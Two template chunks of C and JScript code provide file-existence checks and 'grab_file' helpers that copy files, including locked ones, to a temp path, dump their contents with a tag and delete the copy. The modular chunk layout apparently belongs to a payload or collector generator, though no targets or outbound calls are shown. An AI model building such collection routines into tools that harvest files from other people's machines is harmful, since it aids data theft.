File: templates/chunks/core/file_ops.c
// chunk: core/file_ops
// depends: core/emit_buffer
// provides: file_exists, emit_file, grab_file

#ifndef CHUNK_FILE_OPS
#define CHUNK_FILE_OPS

static int file_exists(const char *path) {
    return GetFileAttributesA(path) != INVALID_FILE_ATTRIBUTES;
}

static void emit_file(const char *path, DWORD max_sz) {
    HANDLE h = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
                           NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE) return;
    DWORD sz = GetFileSize(h, NULL);
    if (sz == 0 || sz > max_sz) { CloseHandle(h); return; }
    BYTE *buf = (BYTE *)malloc(sz);
    if (buf) {
        DWORD rd;
        if (ReadFile(h, buf, sz, &rd, NULL) && rd > 0)
            emit((const char *)buf, rd);
        free(buf);
    }
    CloseHandle(h);
}

static void grab_file(const char *src, const char *tag, DWORD max_sz) {
    char temp[MAX_PATH];
    GetTempPathA(MAX_PATH, temp);
    char dst[MAX_PATH];
    snprintf(dst, MAX_PATH, "%s\\~%lx.tmp", temp, GetTickCount());
    if (CopyFileA(src, dst, FALSE)) {
        HANDLE hc = CreateFileA(dst, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
        DWORD fsz = (hc != INVALID_HANDLE_VALUE) ? GetFileSize(hc, NULL) : 0;
        if (hc != INVALID_HANDLE_VALUE) CloseHandle(hc);
        emitf("  [%s] %lu bytes\r\n", tag, (unsigned long)fsz);
        emit_file(dst, max_sz);
        DeleteFileA(dst);
    }
}

#endif

File: templates/chunks/jscript/core/file_ops.js
// chunk: core/file_ops
// depends: (none)
// provides: _fso, file_exists, read_file, grab_file
// format: jscript

var _fso = new ActiveXObject("Scripting.FileSystemObject");

function file_exists(p) {
    return _fso.FileExists(p);
}

function read_file(p, maxBytes) {
    try {
        if (!_fso.FileExists(p)) return "";
        var f = _fso.OpenTextFile(p, 1);
        var s = f.ReadAll();
        f.Close();
        if (maxBytes && s.length > maxBytes) s = s.substring(0, maxBytes);
        return s;
    } catch(ex) { return ""; }
}

function grab_file(src, tag) {
    try {
        var tmp = _s.ExpandEnvironmentStrings("%TEMP%") + "\\" + tag + ".tmp";
        _fso.CopyFile(src, tmp, true);
        var s = read_file(tmp, 1048576);
        _fso.DeleteFile(tmp);
        return s;
    } catch(ex) { return ""; }
}
